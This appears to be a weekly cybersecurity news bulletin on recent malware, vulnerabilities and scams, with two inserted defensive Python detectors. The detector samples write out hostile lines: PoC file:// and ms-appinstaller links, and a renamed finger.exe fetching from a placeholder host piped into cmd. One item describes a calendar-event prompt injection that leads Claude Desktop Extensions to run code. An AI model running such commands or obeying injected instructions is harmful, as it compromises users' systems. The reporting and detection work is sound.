Threat activity this week shows one consistent signal: attackers are leaning harder on what already works. Instead of flashy new exploits, many operations are built around quiet misuse of trusted tools, familiar workflows, and overlooked exposures that sit in plain sight.
Another shift is how access is gained versus how it's used. Initial access points are getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent. The objective is less about disruption and more about staying embedded long enough to extract value.
There's also growing overlap between cybercrime, espionage tradecraft, and opportunistic intrusion. Techniques are bleeding across groups, making attribution harder and defense baselines less reliable.
Below is this week's ThreatsDay Bulletin: a tight scan of the signals that matter, distilled into quick reads. Each item adds context on where threat pressure is building next.
-
Notepad RCE via Markdown Links
Microsoft has patched a command injection flaw (CVE-2026-20841, CVSS score: 8.8) in its Notepad app that could result in remote code execution. “Improper neutralization of special elements used in a command (‘command injection’) in Windows Notepad App allows an unauthorized attacker to execute code over a network,” Microsoft said. An attacker could exploit this flaw by tricking a user into clicking a malicious link within a Markdown file opened in Notepad, causing the application to run remote files. “The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user,” the tech giant added. Proof-of-concept (PoC) exploits show that the vulnerability can be triggered by creating a Markdown file with “file://” links that point to executable files (“file://C:/windows/system32/cmd.exe”) or contain special URIs (“ms-appinstaller://?source=...”) to run arbitrary payloads. The issue was fixed as part of its monthly Patch Tuesday update this week. Microsoft added Markdown support to Notepad on Windows 11 last May.
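A defender-side triage check for the link patterns described above, added here as an example and not code from the original bulletin or from Microsoft: it pulls every link out of a Markdown file and flags `file://` targets that end in an executable extension or live on a remote host, plus `ms-appinstaller://` URIs. The extension list, the sample Markdown and the `example.invalid` host are constructed for this example.

```python
import re
from typing import Optional
from urllib.parse import unquote, urlparse

# Constructed policy list: extensions Windows will run directly when a file:// link is opened.
EXECUTABLE_EXTENSIONS = {".exe", ".cmd", ".bat", ".com", ".scr", ".ps1", ".js", ".vbs", ".msi", ".hta"}
# Schemes that hand the link to a handler capable of installing or executing code.
RISKY_SCHEMES = {"ms-appinstaller"}

# Markdown link forms: [text](url), [text](<url with spaces>), <autolink>, and [ref]: url definitions.
INLINE_LINK = re.compile(r"\[[^\]]*\]\(\s*(?:<([^>]+)>|([^\s)]+))")
AUTOLINK = re.compile(r"<([A-Za-z][\w+.-]*:[^>\s]+)>")
REF_DEF = re.compile(r"^\s{0,3}\[[^\]]+\]:\s*<?([^\s>]+)>?", re.MULTILINE)


def extract_links(markdown: str) -> list:
    """Return every link target in document order, without duplicates."""
    candidates = [m.group(1) or m.group(2) for m in INLINE_LINK.finditer(markdown)]
    candidates += AUTOLINK.findall(markdown)
    candidates += REF_DEF.findall(markdown)
    seen, links = set(), []
    for url in candidates:
        if url not in seen:
            seen.add(url)
            links.append(url)
    return links


def classify_link(url: str) -> Optional[str]:
    """Label a risky link, or return None when the scheme is not one Notepad could turn into execution."""
    parsed = urlparse(url.strip())
    scheme = parsed.scheme.lower()
    if scheme in RISKY_SCHEMES:
        return f"risky-scheme:{scheme}"
    if scheme != "file":
        return None
    # file://C:/windows/system32/cmd.exe parses with netloc "C:"; a real host means a UNC target.
    host = parsed.netloc.lower()
    is_drive = re.fullmatch(r"[a-z]:", host) is not None
    path = unquote(parsed.path).replace("\\", "/").lower()
    name = path.rsplit("/", 1)[-1]
    ext = name[name.rfind("."):] if "." in name else ""
    if ext in EXECUTABLE_EXTENSIONS:
        return f"file-executable:{ext}"
    if host and not is_drive:
        return "file-unc-host"
    return "file-scheme"


def scan_markdown(markdown: str) -> list:
    """Return (url, label) pairs for every link that merits a closer look."""
    return [(url, label) for url in extract_links(markdown) if (label := classify_link(url))]


# Constructed sample: two benign links, one local executable, one installer URI, one UNC reference.
SAMPLE_MARKDOWN = """# Release notes
See [the docs](https://example.invalid/docs) and [contact](mailto:team@example.invalid).
[Open the tool](file://C:/windows/system32/cmd.exe)
<ms-appinstaller://?source=https://example.invalid/app.msix>
[share]: file://fileserver/share/readme.txt
"""

if __name__ == "__main__":
    for url, label in scan_markdown(SAMPLE_MARKDOWN):
        print(f"{label:32} {url}")
```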
-
APT Pressure Intensifies on Taiwan
TeamT5 said it tracked more than 510 advanced persistent threat (APT) operations affecting 67 countries globally in 2025, of which 173 attacks targeted Taiwan. “Taiwan’s role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives,” the security vendor said. “Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments.”
-
Node.js Stealer Hits Windows
A new Node.js information stealer named LTX Stealer has been observed in the wild. Targeting Windows systems and distributed via a heavily obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and stages the collected data for exfiltration. “The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details,” CYFIRMA said.
-
Marco Stealer Expands Data Theft
Another new Windows-oriented information stealer is Marco Stealer, which was first observed in June 2025. Delivered via a downloader in a ZIP archive, it primarily targets browser data, cryptocurrency wallet information, data from popular cloud services like Dropbox and Google Drive, and other sensitive data stored on the victim's system. “Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker,” Zscaler ThreatLabz said. “Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.”
-
Telegram Sessions Hijacked via OAuth Abuse
A new account takeover campaign has been observed abusing Telegram's native authentication workflows to obtain fully authorized user sessions. In one variant, victims are prompted to scan a QR code on bogus sites using the Telegram mobile application, initiating a legitimate Telegram login attempt tied to attacker-controlled API credentials. Telegram then sends an in-app authorization prompt to the victim's existing session. Alternatively, users can also enter their country code, phone number, and verification code (if enabled) on a fake web page, which causes the data to be relayed to Telegram's official authentication APIs. Upon successful verification, Telegram issues an in-app authorization request as before. “Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram’s legitimate login and authorization infrastructure,” CYFIRMA noted. “By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion.”
-
Discord Expands Global Age Checks
Discord has announced it will require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content. Additionally, it will implement an age inference model, a new system that runs in the background to help determine whether an account belongs to an adult, without always requiring users to verify their age. The company has assured that video selfies do not leave a user's device, that identity documents submitted to third-party vendors, in this case k-ID, are “deleted quickly” or “immediately” after age confirmation, and that a user's age verification status cannot be seen by other users. However, concerns have been raised about whether Discord can be trusted with their most sensitive information, especially in the aftermath of a security breach of a third-party service that Discord previously relied on to verify ages in the U.K. and Australia. The incident led to the theft of government IDs of 70,000 Discord users. In a statement given to Ars Technica, k-ID said the age estimation technology runs entirely on device and no third parties store personal data shared during age checks. The move comes at a time when laws requiring age verification on social media platforms are being adopted internationally. Discord confirmed that “a phased global rollout” would begin in “early March,” at which point all users globally will be defaulted to “teen-appropriate” experiences.
-
GuLoader Refines Evasion Tradecraft
A new analysis of the GuLoader malware has revealed that it employs polymorphic code to dynamically assemble constants during execution and exception-based control flow obfuscation to conceal its functionality and evade detection. Besides introducing sophisticated exception-handling mechanisms to complicate analysis, the malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services such as Google Drive and OneDrive. First observed in December 2019, GuLoader serves primarily as a downloader for Remote Access Trojans (RATs) and information stealers.
-
$73.6M Pig-Butchering Scam Sentence
Daren Li, 42, a dual national of China and St. Kitts and Nevis, has been sentenced in absentia in the U.S. to the statutory maximum of 20 years in prison and three years of supervised release for his international cryptocurrency investment scheme known as pig butchering or romance baiting that defrauded victims of more than $73.6 million. Li pleaded guilty to his crime in November 2024. However, the defendant cut off his ankle monitor and fled the country in December 2025. His current whereabouts are unknown. “As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services,” the U.S. Justice Department said. “The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications.” The co-conspirators established spoofed domains and websites that resembled legitimate cryptocurrency trading platforms and tricked victims into investing in cryptocurrency through these fraudulent platforms after gaining their trust. Li also confessed that he would direct co-conspirators to open U.S. bank accounts established on behalf of 74 shell companies and would monitor the receipt of interstate and international wire transfers of victim funds. “Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency,” the department said.
-
0-Click AI Prompt RCE Risk
A zero-click remote code execution vulnerability (CVSS score: 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise a system via a simple Google Calendar event when a user issues a harmless prompt like “Please check my latest events in google cal[endar] and then take care of it for me.” The problem stems from how MCP-based systems like Claude DXT autonomously chain together different tools and external connectors to fulfil user requests without enforcing proper security boundaries. The phrase “take care of it” does the heavy lifting here, as the artificial intelligence (AI) assistant interprets it as a justification to execute arbitrary instructions embedded in those events without seeking users' permission. The flaw affects more than 10,000 active users and 50 DXT extensions, according to LayerX. “Unlike traditional browser extensions, Claude Desktop Extensions run unsandboxed with full system privileges,” the browser security company said. “As a result, Claude can autonomously chain low-risk connectors (e.g., Google Calendar) to high-risk local executors, without user awareness or consent. If exploited by a bad actor, even a benign prompt (‘take care of it’), coupled with a maliciously worded calendar event, is sufficient to trigger arbitrary local code execution that compromises the entire system.” Anthropic has opted not to fix the issue at this time. A similar Google Gemini prompt injection flaw was disclosed by Miggo Security last month.
-
Data-Theft Ransomware Surges
A nascent ransomware group called Coinbase Cartel has claimed more than 60 victims since it first emerged in September 2025. “Coinbase Cartel operations are marked by an insistence on stealing data while leaving systems available rather than complementing data theft with the use of encryptors that prohibit system access,” Bitdefender said. The healthcare, technology, and transportation industries represent a major chunk of Coinbase Cartel's largest victim demographic so far. The healthcare organizations impacted by the threat actor are primarily based in the U.A.E. Some of the other prominent groups that are focused only on data theft are World Leaks and PEAR (Pure Extraction and Ransom). The development paints a picture of an ever-evolving ransomware landscape populated by new and old actors, even as the threat is getting increasingly professionalized as attackers streamline operations. According to data from Cyble, 6,604 ransomware attacks were recorded in 2025, up 52% from the 4,346 attacks claimed by ransomware groups in 2024.
-
Google Expands Privacy Takedowns
Google has expanded its “Results about you” tool to give users more control over sensitive personal information and added a way to request removal of non-consensual explicit images from search results, as well as other details like driver's license numbers, passport numbers, and Social Security numbers. “We understand that removing existing content is only part of the solution,” Google said. “For added protection, the new process allows you to opt in to safeguards that will proactively filter out any additional explicit results that might appear in similar searches.”
-
Monitoring Tools Used for Ransomware
Threat actors have been observed leveraging Net Monitor, a commercial workforce monitoring tool, with SimpleHelp, a legitimate remote monitoring and management (RMM) platform, as part of attacks designed to deploy Crazy ransomware. The two incidents, believed to be the work of the same threat actor, took place in January and February 2026. Net Monitor comes with various capabilities that go beyond employee productivity monitoring, including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation. These features, coupled with SimpleHelp's remote access functionality, make them attractive tools for attackers looking to blend into enterprise environments without deploying traditional malware. What's more, Net Monitor for Employees Professional bundles a pseudo-terminal (“winpty-agent.exe”) that facilitates full command execution. Bad actors have been found to leverage this aspect to conduct reconnaissance, deliver additional payloads, and deploy secondary remote access channels, turning it into a functional remote access trojan. “In the cases observed, threat actors used these two tools together, using Net Monitor for Employees as a primary remote access channel and SimpleHelp as a redundant persistence layer, ultimately leading to the attempted deployment of Crazy ransomware,” Huntress said.
-
0APT Victim Claims Questioned
A threat actor called 0APT appears to be falsely claiming that it has breached over 200 victims within a span of a week since launching its data leak site on January 28, 2026. Further analysis has determined that the victims are a mix of wholly fabricated generic company names and recognizable organizations that threat actors have not breached, GuidePoint's Research and Intelligence Team said. The data leak site went offline on February 8, 2026, before resurfacing the next day with a list of more than 15 very large multinational organizations. “0APT is likely operating in this deceptive manner in order to support extortion of uninformed victims, re-extortion of historical victims from other groups, defrauding of potential affiliates, or to garner interest in a nascent RaaS group,” security researcher Jason Baker noted. While signs suggest that the group may be bluffing about its victim count, the Windows and Linux ransomware samples have been found to be fully operational, per Halcyon. It's worth pointing out that ransomware groups like RansomedVC have listed fabricated attacks on their data leak sites to deceive victims. Seen in that light, 0APT's exaggerated claims are likely an attempt to gain visibility and momentum among its peers. Its origins remain unknown.
-
SYSTEM RCE via Named Pipe
A high-risk security vulnerability (CVE-2025-67813, CVSS score: 5.3) in Quest Desktop Authority could allow attackers to execute remote code with SYSTEM privileges. “Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network,” NetSPI said. The named pipe implements a custom IPC protocol that supports dangerous operations, including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation. Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent.
-
AI Traffic Scans to Block VPNs
Russia's internet watchdog will use artificial intelligence (AI) technology to analyze internet traffic and restrict the operation of VPN services, Forbes Russia reported. Roskomnadzor is expected to spend close to $30 million to develop the internet traffic filtering mechanism this year. The Russian government has blocked access to tens of VPN apps in recent years. It also maintains a registry of banned websites.
-
Mispadu Expands Banking Attacks
Cofense said it has observed Mispadu campaigns targeting Latin America, particularly Mexico and Brazil, and to a lesser extent Spain, Italy, and Portugal, with phishing emails containing HTML Application (HTA) attachments that are designed to bypass Secure Email Gateways (SEGs) to reach the inboxes of employees worldwide. “The only variation is that sometimes the URL delivering the HTA files is embedded in an attached, password-protected PDF rather than embedded in the email itself,” Cofense said. “In all recent campaigns, Mispadu makes use of an AutoIT loader and various legitimate files to run the malicious content. Each step of the delivery chain from the attached PDF to the AutoIT script is dynamically generated. This means that every hash except for the AutoIT compiler is unique to each install, further frustrating EDR.” Recent iterations of the banking trojan include the ability to self-propagate from infected hosts via email and expand the targeted online banking websites to include banks outside of Latin America as well as cryptocurrency exchanges.
-
ScreenConnect Deployed via Phish
In a phishing campaign documented by Forcepoint, spoofed emails were found to deliver a malicious .cmd attachment that escalates privileges, disables Windows SmartScreen, removes the mark-of-the-web (MotW) to bypass security warnings, and ultimately installs ConnectWise ScreenConnect. The campaign has targeted organizations across the U.S., Canada, the U.K., and Northern Ireland, focusing on sectors with high-value data, including government, healthcare, and logistics companies. Recent phishing attacks have also abused web services from Amazon, like Simple Storage Service (S3) buckets, Amazon Simple Email Service (SES), and Amazon Web Services (AWS) Amplify, to slip past email security controls and launch credential phishing attacks. Other phishing attacks have embraced unusual techniques like using edited versions of legitimate business emails to send convincingly spoofed emails to recipients. “These emails work by having the threat actor create an account on a legitimate service and input arbitrary text into a field that will later be included in outgoing emails,” Cofense said. “After this is done, the threat actor would need to receive a legitimate email that happens to include the malicious text that was created by the threat actor. Once the email is received, the threat actor can then redirect the email to the intended victims.”
-
CrashFix Delivers SystemBC
A variant of the ClickFix attack called CrashFix has been used to deliver malicious payloads consistent with a known malware called SystemBC. Unlike the CrashFix-style social engineering flow documented by Huntress and Microsoft, the attack stands out because it did not involve the use of a malicious browser extension. “Instead, the victim was convinced to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix,” Binary Defense said. “This command abused a legitimate Windows binary — finger.exe — copied from System32, renamed, and executed from a user-writable directory. The output of this execution was piped directly into cmd.exe, acting as a delivery mechanism for an obfuscated PowerShell payload.” The PowerShell code then retrieves follow-on content, including Python backdoors and a DLL implant that overlaps with SystemBC, from attacker-controlled infrastructure, while taking steps to fingerprint the host and clean up artifacts on disk. “The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy,” the company said. “By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult.”
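Detection logic for the execution chain Binary Defense describes, added here as an example and not code from the bulletin or from Binary Defense: it runs over process-creation events shaped like Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, ParentImage) and flags a finger.exe copy running outside System32, a renamed finger.exe, and output piped into cmd.exe from a user-writable path. The writable-directory hints, the sample events and the `placeholder.invalid` host are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Where a genuine finger.exe lives; execution from anywhere else is the LOLBin-copy signal.
SYSTEM_DIRS = (r"c:\windows\system32\\".rstrip("\\") + "\\", r"c:\windows\syswow64\\".rstrip("\\") + "\\")
# Constructed list of user-writable locations seen in ClickFix-style staging.
USER_WRITABLE_HINTS = (r"\appdata\local\temp\\".rstrip("\\") + "\\", r"\downloads\\".rstrip("\\") + "\\",
                       r"c:\users\public\\".rstrip("\\") + "\\", r"\programdata\\".rstrip("\\") + "\\")
# A pipe whose right-hand side is cmd / cmd.exe, optionally quoted or given with a full path.
PIPE_TO_CMD = re.compile(r'\|\s*"?(?:[a-z]:\\[^\s"]*\\)?cmd(?:\.exe)?"?(?:\s|$)')


@dataclass
class ProcessEvent:
    image: str               # Sysmon Image: full path of the started executable
    original_file_name: str  # Sysmon OriginalFileName from PE version info; survives renaming
    command_line: str        # Sysmon CommandLine
    parent_image: str        # Sysmon ParentImage


def detect_crashfix(ev: ProcessEvent) -> List[str]:
    """Return the CrashFix indicators present in one event (empty list means nothing matched)."""
    findings = []
    image, orig = ev.image.lower(), ev.original_file_name.lower()
    cmd, parent = ev.command_line.lower(), ev.parent_image.lower()
    # Rule A: the PE is finger.exe by version info but is not running from a system directory.
    if orig == "finger.exe" and not image.startswith(SYSTEM_DIRS):
        findings.append("finger.exe executing outside System32/SysWOW64")
        if not image.endswith("\\finger.exe"):
            findings.append("finger.exe renamed on disk")
    # Rule B: something on the left of a pipe feeds cmd.exe, and that something is finger
    # or a binary staged in a user-writable directory.
    m = PIPE_TO_CMD.search(cmd)
    if m:
        left = cmd[:m.start()]
        if "finger" in left or any(h in left for h in USER_WRITABLE_HINTS):
            findings.append("output piped into cmd.exe from finger/user-writable binary")
            if parent.endswith("\\explorer.exe"):
                findings.append("launched from Explorer (Run dialog pattern)")
    return findings


def scan_events(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index to its findings, keeping only events that tripped at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := detect_crashfix(ev))}


# Constructed sample events: a legitimate finger query, a Run-dialog staging command, and the
# renamed copy executing from a public directory.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\finger.exe", "finger.exe",
                 "finger user@placeholder.invalid", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
                 r"cmd /c copy C:\Windows\System32\finger.exe C:\Users\Public\upd.exe & "
                 r"C:\Users\Public\upd.exe cfg@placeholder.invalid | cmd",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Users\Public\upd.exe", "finger.exe",
                 r"C:\Users\Public\upd.exe cfg@placeholder.invalid", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {'; '.join(hits)}")
```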
-
76 Zero-Days Found in Cars
The third annual Pwn2Own Automotive competition held in Tokyo, Japan, late last month uncovered 76 unique zero-day vulnerabilities in a variety of targets, such as in-vehicle infotainment (IVI) systems (Tesla), electric vehicle (EV) chargers (Alpitronic HYC50, ChargePoint Home Flex), and automotive operating systems (Automotive Grade Linux). Team Fuzzware.io won the hacking competition with total winnings of $215,000, followed by Team DDOS with $100,750 and Synacktiv with $85,000.
-
Bing Ads Funnel Tech Scams
Malicious ads served on Bing search results when searching for sites like Amazon are being used to redirect unsuspecting users to tech support scam links hosted in Azure Blob Storage. The campaign targeted healthcare, manufacturing, and technology sectors in the U.S. “Clicking on the malicious ad sent the victims to highswit[.]space, a newly registered domain hosting an empty WordPress site, which then redirected them to one of the Azure Blob Storage containers, which served a typical tech support scam site,” Netskope Threat Labs said.
-
Chinese VPN Infra Footprint Expands
A Chinese virtual private network (VPN) provider named LVCHA VPN has been used by devices in Russia, China, Myanmar, Iran, and Venezuela. It also has an Android app that is directly hosted on its website (“lvcha[.]in”) and distributed via the Google Play Store. Further analysis of the domain has uncovered a cluster of nearly 50 suspicious domains, all of which promote the same VPN. “Whenever we see campaigns promoting suspicious downloads or products using so many domains, it can indicate that the operator is rotating domains to work around country-level firewalls in regions where they’re trying to promote distribution,” Silent Push said.
-
Grid Attack Triggers Western Alerts
Following a late December 2025 coordinated cyber attack on Poland's power grid, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a bulletin for critical infrastructure owners and operators. CISA said vulnerable edge devices remain a prime target for threat actors, OT devices without firmware verification can be permanently damaged, and threat actors leverage default credentials to pivot onto the HMI and RTUs. “Operators should prioritize updates that allow firmware verification when available,” the agency added. “Operators should immediately change default passwords and establish requirements for integrators or OT suppliers to enforce password changes in the future.” In a similar development, Jonathan Ellison, director for national resilience at the National Cyber Security Centre (NCSC), has urged critical infrastructure operators in the country to act now and have incident response plans or playbooks in place to respond to such threats. “Although attacks can still happen, strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does,” Ellison said.
-
Telnet Traffic Abruptly Collapses
Threat intelligence firm GreyNoise said it observed a steep decline in global Telnet traffic on January 14, 2026, six days before a security advisory for CVE-2026-24061 went public on January 20. CVE-2026-24061 relates to a critical vulnerability in the GNU InetUtils telnet daemon that could result in an authentication bypass. Data gathered by GreyNoise shows that the hourly volume of Telnet sessions dropped 65% on January 14 at 21:00 UTC, then fell 83% within two hours. Daily sessions have declined from an average of 914,000 (from December 1, 2025, to January 14, 2026) to around 373,000, equating to a 59% reduction that has persisted as of February 10, 2026. “Eighteen ASNs with significant pre-drop telnet volume (>50K sessions each) went to absolute zero after January 15,” the company said. “Five entire countries vanished from GreyNoise telnet data: Zimbabwe, Ukraine, Canada, Poland, and Egypt. Not reduced to zero.” Among the 18 ASNs included were British Telecom, Charter/Spectrum, Cox Communications, and Vultr. Although correlation does not imply causation, GreyNoise has raised the possibility that the telecom operators likely received advance warning about CVE-2026-24061, allowing them to act on it at the infrastructure level. “A backbone or transit provider — possibly responding to a coordinated request, possibly acting on their own assessment — implemented port 23 filtering [to block telnet traffic] on transit links,” it said.
-
New Loaders Fuel Stealer Campaigns
Cyderes and Cato Networks have detailed two previously undocumented malware loaders dubbed RenEngine Loader and Foxveil that have been used to deliver next-stage payloads. The Foxveil malware campaign has been active since August 2025. It's engineered to establish an initial foothold, complicate analysis efforts, and retrieve next-stage shellcode payloads from threat actor-controlled staging hosted on trusted platforms like Cloudflare Pages, Netlify, and Discord. Attacks leveraging RenEngine Loader, on the other hand, have employed illegally modified game installers distributed via piracy platforms to deliver the malware alongside the playable content. More than 400,000 global victims are estimated to have been impacted, with most of them located in India, the U.S., and Brazil. The activity has been operational since April 2025. “RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader, enabling rapid tooling evolution and flexible capability deployment,” Cyderes said. “By embedding a modular, stealth-focused second-stage loader inside a legitimate Ren’Py launcher, the attackers closely mimic normal application behavior, significantly reducing early detection.” The end goal of the attack is to deploy an information stealer called ACR Stealer.
-
Looker RCE Chain Disclosed
Two novel security vulnerabilities have been disclosed in Google Looker that could be exploited by an attacker to fully compromise a Looker instance. This includes a remote code execution (RCE) chain via Git hook overrides and an authorization bypass flaw via internal database connection abuse. Successful exploitation of the flaws could allow an attacker to run arbitrary code on the Looker server, potentially leading to cross-tenant access, as well as exfiltrate the entire internal MySQL database via error-based SQL injection, according to Tenable. “The vulnerabilities allowed users with developer permissions in Looker to access both the underlying system hosting Looker, and its internal database,” Google said. Collectively tracked as CVE-2025-12743, aka LookOut (CVSS score: 6.5), they were patched by Google in September 2025. While the fixes have been applied to cloud instances, users of self-hosted Looker instances are advised to update to the latest supported version.
-
Trojanized 7-Zip Spreads Proxyware
A fake installer for the 7-Zip file archiver tool downloaded from 7zip[.]com (the legitimate domain is 7-zip[.]org) is being used to drop a proxy component that enrolls the infected host as a residential proxy node. This allows third parties to route traffic through the victim's IP address while concealing their own origins. The installer is digitally signed with a now-revoked certificate originally issued to Jozeal Network Technology Co., Limited. The campaign has been codenamed upStage Proxy by security researcher Luke Acha, who discovered it late last month. “The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of 7-Zip File Manager alongside a concealed malware payload,” Malwarebytes said. The 7-Zip lure appears to be part of a broader effort that uses trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN. Attack chains involve using YouTube tutorials as a malware distribution vector to direct unsuspecting users to the bogus site, once again highlighting the abuse of trusted platforms.
-
AI-Built VoidLink Expands Reach
VoidLink is a sophisticated Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. First documented by Check Point last month, ongoing analyses of the malware have revealed that it may have been developed by a Chinese-speaking developer using an artificial intelligence (AI) model with limited human oversight. Ontinue, in a report published this week, said it found “strong indicators” that the implant was built using a large language model (LLM) coding agent. “It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials from environment variables, config directories, and instance metadata APIs,” security researcher Rhys Downing said. “It detects container runtimes and includes plugins for container escape and Kubernetes privilege escalation. A kernel-level rootkit adapts its stealth approach based on the host’s kernel version.” Cisco Talos said it has observed the modular framework in campaigns undertaken by a new threat actor codenamed UAT-9921, which is believed to have been active since 2019. The cybersecurity company said it also found “clear indications” of a Windows equivalent of VoidLink that comes with the ability to load plugins. “UAT-9921 uses compromised hosts to install VoidLink command and control (C2), which are then used to launch scanning activities both internal and external to the network,” Talos researchers said.
Taken together, these developments show how threat actors are balancing speed with patience: moving fast where defenses are weak, and slowing down where stealth matters more than impact. The result is activity that blends into normal operations until damage is already underway.
For defenders, the challenge isn't just blocking access anymore. It's recognizing misuse of legitimate access, spotting abnormal behavior within trusted systems, and closing gaps that don't look dangerous on the surface.
The briefs that follow aren't isolated incidents. They're fragments of a wider operating picture, one that keeps evolving week after week.